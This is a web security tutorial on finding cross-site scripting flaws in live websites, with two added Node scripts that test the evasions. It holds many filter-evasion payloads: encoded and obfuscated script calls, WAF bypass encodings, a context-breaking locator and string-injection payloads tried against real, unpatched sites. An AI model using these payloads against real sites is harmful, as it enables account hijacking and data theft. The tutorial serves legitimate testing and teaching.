Finding XSS in Real World
by Alexander Korznikov, 1 April 2015

Hi there. In this tutorial I will try to explain how to find XSS in the real world, using some interesting techniques. As you all know, XSS is based on code injection: it may be a <script> tag injection, or just an alert() dropped into an existing script; I will explain that later.

What do you need to find an XSS? Simply a browser. But if you want to find it much faster, you may use this software:
1. Firefox browser
2. FireBug add-on
3. HackBar add-on
4. Google

I wanted to learn some advanced XSS techniques and found a pretty cool way: there are tons of verified XSSs published by lots of security researchers, affecting VIP sites too (a VIP website on xssposed.org is one with Google PR > 6 or an Alexa rank below a fixed cut-off). So I wrote a script that grabbed all xssposed.org XSS URLs and started filtering out the uninteresting fields. There were about 7500 URLs. You can download the list from the link in the original post and filter out everything you don't need.

1. Real XSS (HTML injection) demo

I will take real examples of XSSs from xssposed.org that were not patched for a very, very long time. Our first target is an XSS report dated 14/06/2008; since that date the same XSS has been reported three more times.
Take a look at the search field. Let's enter a RANDOMSTRING wrapped in an <xxx> tag. The purpose of this test is to check whether there is any sanitisation of user input:
<xxx>randomstring<xxx>
As output, we see our RANDOMSTRING without the <xxx> tags. An unknown tag that disappears from the rendered page has been parsed as markup; if the input were encoded you would see the literal text <xxx> on the page (and &lt;xxx&gt; in the source), and if it were stripped you would see neither in the page nor in the source.

Let's take a look at the source (Ctrl+U in Firefox and Chrome). As you can see, there is no filtering and our <xxx> tag was passed to the browser as HTML: the purple colour in the source view means <xxx> was interpreted as a tag. Finally, we enter:
<script>alert(document.domain)</script>

One thing you should notice: there are no GET parameters in the URL; in this example POST was used. Open the HackBar add-on in Firefox and, once you are on the search results page, press Load URL and tick the checkbox Enable Post data. Some server-side scripts handle GET and POST requests the same way (PHP's $_REQUEST, for example, merges both), so a reflected POST parameter is worth retrying as a GET parameter: if that works, the XSS becomes a single link instead of a form that has to be submitted. Let's check it:
2. WAF Filter Evasions

What if the <script> tag is filtered out? Some WAF evasion cheat-sheets claim tricks that get a <script> tag through, but I've never seen this work in the real world, so I don't even try it. Some variations that need no <script> tag at all:
<img src=x onerror=alert()>
<img/src=x onerror="alert()">
<svg onload=alert()>
<svg/onload="alert()">
<marquee onstart=alert()>
<div style="width:1000px;height:1000px" onmouseover=alert()>asdfa</div>
<a onmouseover=alert()>some random text

What if alert() is filtered?
confirm()
prompt()
window['alert']('xss')
window['ale'+'rt']('xss')
eval(window.atob('YWxlcnQoJ3hzcycp')) // decode the base64 string and execute it; it decodes to alert('xss')
eval(window['atob']('YWxlcnQoJ3hzcycp'))
window['e'+'v'+'a'+'l'](window['atob']('YWxlcnQoJ3hzcycp'))

Awesome evasion technique: []["filter"]["constructor"](CODE)(). []["filter"] is a function, and the constructor of any function is Function itself, so this is Function(CODE)(): it compiles and runs CODE in global scope exactly like an indirect eval, without the word eval appearing anywhere. So eval("alert('xss')") is equivalent to:
[]["filter"]["constructor"](window['atob']('YWxlcnQoJ3hzcycp'))() // equals eval()
And more evasion:
[]["fil"+"ter"]["constr"+"uctor"](window['atob']('YWxlcnQoJ3hzcycp'))()
atob('PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+') // decoded base64 == <script>alert()</script>

Some reference on values you can build out of the characters []()!+ alone:
false => ![]
true => !![]
undefined => [][[]]
NaN => +[![]]
0 => +[]
1 => +!+[]
2 => !+[]+!+[]
10 => [+!+[]]+[+[]] // the string "10", from concatenating the arrays [1] and [0]
Array => []
Number => +[]
String => []+[]
Boolean => ![]
Function => []["filter"]
eval => []["filter"]["constructor"](CODE)()
window => []["filter"]["constructor"]("return this")()

Some security researchers go deeper and develop tools such as JSFuck that convert any JavaScript code into only the characters []()!+. The encoding of []["filter"] starts like this (the first two bracketed terms are "false"[0] and "falseundefined"[10], i.e. "f" and "i"):
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])...
Thanks to Patricio Palladino and Martin Kleppe. You already understand string manipulation like 'ale'+'rt', so I won't explain it again :)

What if the ( and ) characters are filtered?
onerror=alert;throw 'xss'
This assigns alert as the global error handler and then throws; the browser calls the handler with the error message, so alert fires without a single parenthesis in the payload.

The hex-escape trick: inside a JavaScript string, \x28 and \x29 are ( and ), so a string literal can carry markup or code that the filter never sees in clear text:
document.body.innerHTML += "<img src=x onerror=alert\x28\x29>" // in hex: \x28 == ( and \x29 == )
Or you can encode the whole string in hex; this one decodes to <script>alert()</script>:
"\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"
Two caveats. document.body += "..." (as the original cheat-sheet form has it) appends nothing: the document.body setter accepts only a <body> or <frameset> element, so assigning a string to it throws instead of appending; document.body.innerHTML += "..." is what you want. And a <script> element inserted through innerHTML is never executed, so markup appended this way has to carry an event handler (onerror, onload, onmouseover) rather than a <script> tag.

Or just use your XSS as an open redirect:
document.location = //open redirect
Again, document.location == document['locati'+'on']. Keep that in mind. As an additional reference, I recommend reading this book:

Simple HTML injections are easy to sanitise: filter out tags and the = character, and finding an XSS becomes a painful job. For example, Microsoft .NET 4 request validation marks every request containing < followed by almost any ASCII letter as a Dangerous Request, so <s, <m or </ are all rejected; I've not found a way to evade it. The only way to bypass it is an attribute injection into an existing tag, such as
" onmouseover=alert() >
which works only when your input is reflected inside a tag attribute and the = character is not filtered out.

ModSecurity doesn't know about confirm(). Some other filters don't handle Unicode encoding and/or double URL encoding. If you can't use the onload keyword, try
onl%00oad   // null byte
onl%u006fad // %u Unicode encoding of o (decoded only by some servers, IIS in particular)
onl%256fad  // double URL encoding: %25 is %, so %256f decodes to %6f and then to o
And if the = character is filtered or marked as dangerous, try onload%u003d (the %u Unicode representation of =).

Fine. This is over. Next, I will show you a real example of inline JavaScript injection.
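As an added example (my own code, not part of Korznikov's tutorial), the Node script below puts a naive keyword blocklist next to the evasions above and checks the two things a tester actually cares about: that the rewritten payload no longer matches the filter, and that it still runs the same code. The blocklist, the helper names (splitLiteral, bracketCall, constructorEval, hexEscape, fire) and the Node stand-ins for window, alert and atob are my assumptions; in a browser the real globals take their place.

```javascript
// Added example: naive keyword filter vs. the evasions described above.
// Not from the original tutorial; helper names are my own. Runs under Node.

// Stand-ins for the browser globals (assumption: a real page provides these).
const alertCalls = [];
globalThis.window = globalThis;
globalThis.alert = (msg) => { alertCalls.push(String(msg)); };
if (typeof globalThis.atob !== 'function') {
  globalThis.atob = (b64) => Buffer.from(b64, 'base64').toString('latin1');
}

// A naive WAF-style blocklist: it only knows the literal keywords.
const BLOCKLIST = [/\balert\s*\(/i, /\beval\s*\(/i, /<script/i];
function naiveWafBlocks(payload) {
  return BLOCKLIST.some((re) => re.test(payload));
}

// 'alert' -> "'ale'+'rt'": the keyword never appears contiguously.
function splitLiteral(word) {
  const mid = Math.ceil(word.length / 2);
  return `'${word.slice(0, mid)}'+'${word.slice(mid)}'`;
}

// window['ale'+'rt']('xss'): bracket lookup instead of a dotted call.
function bracketCall(fnName, argSource) {
  return `window[${splitLiteral(fnName)}](${argSource})`;
}

// Base64 for the atob() variants; "alert('xss')" -> "YWxlcnQoJ3hzcycp".
function b64(code) {
  return Buffer.from(code, 'latin1').toString('base64');
}

// []["filter"]["constructor"] is the Function constructor, so
// []["fil"+"ter"]["constr"+"uctor"](atob('...'))() behaves like eval()
// while the words eval, alert and script never appear in the payload.
function constructorEval(code) {
  return `[][${splitLiteral('filter')}][${splitLiteral('constructor')}]` +
         `(window[${splitLiteral('atob')}]('${b64(code)}'))()`;
}

// "<script>" -> "\x3c\x73..." for contexts where < > ( ) are filtered
// but a JavaScript string literal is available.
function hexEscape(text) {
  return Array.from(text, (ch) =>
    '\\x' + ch.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}

// The global object, derived the way the reference table does it.
function globalViaConstructor() {
  return []['filter']['constructor']('return this')();
}

// Execute a payload in global scope, as an injected script would, and
// report what alert() received.
function fire(source) {
  alertCalls.length = 0;
  new Function(source)();
  return alertCalls.slice();
}

// Demo: the plain payload is blocked, both rewrites pass and still fire.
for (const p of ["alert('xss')",
                 bracketCall('alert', "'xss'"),
                 constructorEval("alert('xss')")]) {
  console.log(naiveWafBlocks(p) ? 'BLOCKED' : 'passes ', fire(p), p);
}
```

The point of the `fire` step is that an evasion is only useful if it still does what the original payload did; a payload that slips past the filter but throws in the browser is worthless, so test both sides.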
3. Inline JavaScript injection

The interesting thing is that this type of injection can be found on popular websites. Even if tags and the = character are sanitised, XSS is still possible: if the website's logic (server-side or client-side, it doesn't matter) reflects user input into the page's JavaScript, we can use it for nasty purposes :)

A simple example. We have a URL with two parameters:
1. Parameter id is handled by server-side logic and checked to be an INTEGER.
2. Parameter style is handled by client-side JavaScript and reflected in this context:
site.style = 'blue'
If we pass the string blue' (with a trailing single quote) as style, the context becomes:
site.style = 'blue''
and the browser throws a JavaScript exception: SyntaxError: unterminated string literal. The model is 'string'trash'string': the injected quote closes the literal early and whatever follows is parsed as code, leaving the original closing quote to open a string that never ends.
In the case of double quotes the payload is blue", with the same result: SyntaxError: unterminated string literal.
If the id parameter were handled client-side and reflected as
site.id = 1
the payload id=1 trash would give
site.id = 1 trash
which also throws a SyntaxError. And if our payload is style=blue\ we get
site.style = 'blue\'
which is again a SyntaxError, because JavaScript treats \' as an escaped quote, so the string is never closed.

So we can build a noninvasive XSS locator:
'">trash\
single quote / double quote / greater-than sign / a marker string / backslash. Each character breaks a different context (single-quoted string, double-quoted string, HTML tag or attribute, and a trailing backslash that swallows the closing quote), and none of them executes anything, so the probe is harmless on a page that is not vulnerable.

Some examples of what this locator will break, with no filtering in place:
HTML code break (in the original slide: RED = rendered as tags, BLUE = thrown out onto the screen):
<a href="'">trash\" style="blablabla">
the first " closes the href value, > closes the tag, and the rest is rendered as text.
JavaScript SyntaxErrors:
var a = 'blue'">trash\'
a = unescape('blue'">trash\')
var a = "blue'">trash\"

Sometimes the website logic escapes the ' or " characters, so try adding escaped quotes to our locator:
\'\">trash\
As a result you may see:
var a = 'blue\\'\\">trash\'
A \ in the input became \\ in the output: the escaping routine escaped our backslash, so it is now a literal backslash inside the string, and the quotation mark right after it is rendered unescaped and closes the string.

One more thing to remember: we can apply arithmetic operators to any object in JavaScript, for example 'ale'+'rt', or a-b, or a*b. Google for more info :)

Examples of nasty JavaScript injections with various payloads, starting from the context var a = 'blue':
var a = 'blue'-alert('xss')-''        // alert() is executed
var b = ['red','blue',alert('xss'),'']
var c = func('blue'+alert(/xss/))//')  // after // the rest of the line is commented out

Inline JavaScript real demo. Our second target is an XSS report dated 28/06/2014. To make our life easier we will need the FireBug and HackBar Firefox add-ons. Enter our XSS locator ('">trash\) in the website's Find Jobs input field:
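As an added example (my own code, not from the tutorial), this Node script reproduces the string-context injection just described: a template that reflects user input into var a = '...', three encoders (no escaping, escaping of single quotes only, and a proper JavaScript string literal built with JSON.stringify), the '">trash\ locator as the probe, and the '-alert(...)-' and \'-alert(...)// payloads. The encoder names, the render/probe/run helpers, the template and the Node stand-in for alert are my assumptions.

```javascript
// Added example: detecting and exploiting reflection into a JavaScript
// string literal. Not from the original tutorial; helper names are my own.

// Stand-in for the browser's alert(): records what an injected call passed in.
const fired = [];
globalThis.alert = (msg) => { fired.push(String(msg)); };

// Three ways a site might put user input into var a = '...':
const ENCODERS = {
  // no filtering at all
  none: (s) => `'${s}'`,
  // the partial fix the text describes: escape single quotes, nothing else
  quotesOnly: (s) => `'${s.replace(/'/g, "\\'")}'`,
  // a correct JavaScript string literal: JSON.stringify escapes \ " and
  // control characters; additionally escape < so "</script>" can never
  // close an inline script block, and U+2028/2029 for older engines
  jsLiteral: (s) => JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/[\u2028\u2029]/g, (c) => '\\u' + c.charCodeAt(0).toString(16)),
};

// The server-side template (constructed for this example).
function render(encoder, input) {
  return `var a = ${ENCODERS[encoder](input)}; return a;`;
}

// The noninvasive locator from the text: single quote, double quote, >, marker, backslash.
const LOCATOR = "'\">trash\\";

// Probe: does the reflected script still parse? null means it does;
// otherwise the exception name ('SyntaxError' for a broken context).
function probe(source) {
  try {
    new Function(source);
    return null;
  } catch (e) {
    return e.name;
  }
}

// Run the reflected script as the page would and report what alert() saw.
function run(source) {
  fired.length = 0;
  const value = new Function(source)();
  return { value, fired: fired.slice() };
}

const PAYLOADS = {
  plain: "'-alert('xss')-'",        // works when quotes are not escaped
  backslash: "\\'-alert(/xss/)//",  // works when only quotes are escaped:
                                    // \' becomes \\' which closes the string
};

// Demo of all three encoders against the locator and both payloads.
for (const enc of Object.keys(ENCODERS)) {
  const broken = probe(render(enc, LOCATOR));
  const hits = Object.values(PAYLOADS)
    .map((p) => render(enc, p))
    .filter((src) => probe(src) === null)
    .flatMap((src) => run(src).fired);
  console.log(enc.padEnd(11), 'locator ->', broken ?? 'parses', '| alert fired:', hits);
}
```

The escape-quotes-only encoder still reports a SyntaxError for the locator, which is exactly what the tutorial's \'\" variant is for: the trailing backslash swallows the closing quote. Only the encoder that emits a complete literal leaves the probe parsing and both payloads inert.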
Submitting it takes us to the search results URL, and in the response FireBug shows that an exception was thrown: SyntaxError: missing } after property list. Clicking on the green URL right after the SyntaxError opens the generated JavaScript source. On lines 570 and 577 the code is broken: after the server-side logic, our XSS locator looks like
'&quot;&gt;trash\
so the " and > characters are converted to the HTML entities &quot; and &gt; respectively.

But the single quote is not converted, and that alone broke the JavaScript code. Let's test for the other useful characters, ( and ), with this payload:
'-a()-'
Looks pretty good: the characters aren't converted and are passed through into the generated JavaScript. How does JavaScript understand this payload? The ' closes the string, and - subtracts the result of the a() function from it. So our final payload should look like:
'-alert('XSS')-'
and it should not break the execution of the generated JavaScript. pwned again :)

Ask & comment at the address given in the original. That's all folks!
More information25 Million Flows Later - Large-scale Detection of DOM-based XSS
25 Million Flows Later - Large-scale Detection of DOM-based XSS Sebastian Lekies SAP AG sebastian.lekies@sap.com Ben Stock FAU Erlangen-Nuremberg ben.stock@cs.fau.de Martin Johns SAP AG martin.johns@sap.com
More informationNewsletterAdmin 2.4 Setup Manual
NewsletterAdmin 2.4 Setup Manual Updated: 7/22/2011 Contact: corpinteractiveservices@crain.com Contents Overview... 2 What's New in NewsletterAdmin 2.4... 2 Before You Begin... 2 Testing and Production...
More information25 Million Flows Later Large- scale Detec6on of DOM- based XSS. Published at ACM CCS 2013 Sebas5an Lekies, Ben Stock, Mar6n Johns
25 Million Flows Later Large- scale Detec6on of DOM- based XSS Published at ACM CCS 2013 Sebas5an Lekies, Ben Stock, Mar6n Johns Me, myself and I Dr. Martin Johns Background in software engineering Academic
More informationPrecise client-side protection against DOM-based Cross-Site Scripting
Precise client-side protection against DOM-based Cross-Site Scripting Ben Stock FAU Erlangen-Nuremberg ben.stock@cs.fau.de Patrick Spiegel SAP AG patrick.spiegel@sap.com Sebastian Lekies SAP AG sebastian.lekies@sap.com
More informationAdvanced Web Development SCOPE OF WEB DEVELOPMENT INDUSTRY
Advanced Web Development Duration: 6 Months SCOPE OF WEB DEVELOPMENT INDUSTRY Web development jobs have taken thе hot seat when it comes to career opportunities and positions as a Web developer, as every
More information1. Building Testing Environment
The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other s web sites as your testing target. First,
More informationInput Validation Vulnerabilities, Encoded Attack Vectors and Mitigations OWASP. The OWASP Foundation. Marco Morana & Scott Nusbaum
Input Validation Vulnerabilities, Encoded Attack Vectors and Mitigations Marco Morana & Scott Nusbaum Cincinnati Chapter September 08 Meeting Copyright 2008 The Foundation Permission is granted to copy,
More informationJavaScript Security. John Graham Cumming
JavaScript Security John Graham Cumming Living in a powder keg and giving off sparks JavaScript security is a mess The security model is outdated Key examples AGacking DNS to agack JavaScript What are
More informationHow to Create an HTML Page
This is a step-by-step guide for creating a sample webpage. Once you have the page set up, you can add and customize your content using the various tags. To work on your webpage, you will need to access
More informationDebugging JavaScript and CSS Using Firebug. Harman Goei CSCI 571 1/27/13
Debugging JavaScript and CSS Using Firebug Harman Goei CSCI 571 1/27/13 Notice for Copying JavaScript Code from these Slides When copying any JavaScript code from these slides, the console might return
More information